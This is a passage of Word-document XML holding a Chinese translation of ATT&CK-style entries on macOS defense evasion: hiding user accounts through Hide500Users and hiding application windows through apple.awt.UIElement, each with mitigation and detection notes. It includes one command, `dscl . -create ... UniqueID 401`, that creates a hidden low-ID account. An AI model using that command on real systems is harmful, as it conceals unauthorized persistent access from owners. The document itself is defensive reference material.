            <w:r>
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
            <w:r>
              <w:t>, root</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34E386CC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>认证日志</w:t>
            </w:r>
            <w:r>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DF5860">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17B70AD1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>版本：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A7DC5C1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06184C64" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA4179">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">macOS </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA4179">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的每个用户帐户都有一个与其关联的用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA4179">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA4179">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。创建用户时，可以为该帐户指定用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA4179">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA4179">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。在</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA4179">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>/Library/Preferences/com.apple.loginwindow</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA4179">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中有一个属性值，称为</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA4179">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hide500Users </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA4179">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户，该属性值可防止用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA4179">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ID 500 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA4179">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和更低用户出现在登录屏幕。通过使用用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA4179">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA4179">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>低于</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA4179">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 500 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA4179">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7B48">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建帐户</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA4179">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技术并启用此属性（将其设置为</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA4179">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>Yes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA4179">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA4179">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），攻击者可以更轻松地隐藏其用户帐户：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>sudo dscl . -create /Users/username UniqueID 401</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA4179">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId106" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af4"/>
            <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
            <w:color w:val="4F7CAC"/>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:t>[1]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA4179">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D37528C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1692"/>
        <w:gridCol w:w="8044"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00D12CC9" w14:paraId="7718D8F2" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1692" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7E66A3DD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00D12CC9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8044" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="42A961C7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00D12CC9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D12CC9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="16746D36" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1692" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F47AAF6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F7B48">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>操作系统配置</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8044" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B765A56" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="009F7B48" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="009F7B48">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果计算机已加入域，则组策略可帮助限制创建或隐藏用户的能力。同样，禁止修改</w:t>
            </w:r>
            <w:r w:rsidRPr="009F7B48">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:snapToGrid/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
              </w:rPr>
              <w:t>/Library/Preferences/com.apple.loginwindow Hide500Users</w:t>
            </w:r>
            <w:r w:rsidRPr="009F7B48">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009F7B48">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的值将强制对所有用户可见。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B8E6D8A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720CEE18" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此技术可防止新用户显示在登录屏幕中，但新用户的所有其他迹象仍然存在。用户仍获取主目录，并将显示在身份验证日志中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7516F9F0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD0865">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>隐藏窗口</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="055DBBC4" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D7F69B2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>编号：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> T1143</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C068EBA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="529E7732" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>平台：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="244F9C4C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D2BCF00" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002E0AB6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34B1001A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>版本：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="77F90B44" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28323155" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>属性列表</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>plist</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>文件中列出了应用程序如何在</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> macOS </w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> OS X </w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>上运行的配置。这些文件中的标记之一可以是</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> apple.awt.UIElement</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，它允许</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java </w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>应用程序防止应用程序的图标出现在</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dock </w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中。这样做的一个常见用途是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>希望</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>应用程序在系统托盘中运行时，不显示在</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dock </w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中。但是，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>可能会滥用此功能并隐藏其运行窗口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289B46A6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1692"/>
        <w:gridCol w:w="8044"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00D12CC9" w14:paraId="581C5F85" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1692" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="67F20DB1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00D12CC9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8044" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="4C0432C4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00D12CC9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D12CC9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="472A0949" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1692" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="538954BF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F7B48">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8044" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5684FEA6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F0E08">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>允许具有此</w:t>
            </w:r>
            <w:r w:rsidRPr="002F0E08">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t xml:space="preserve"> plist </w:t>
            </w:r>
            <w:r w:rsidRPr="002F0E08">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>标记的白名单程序。所有其他程序应视为可疑程序。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
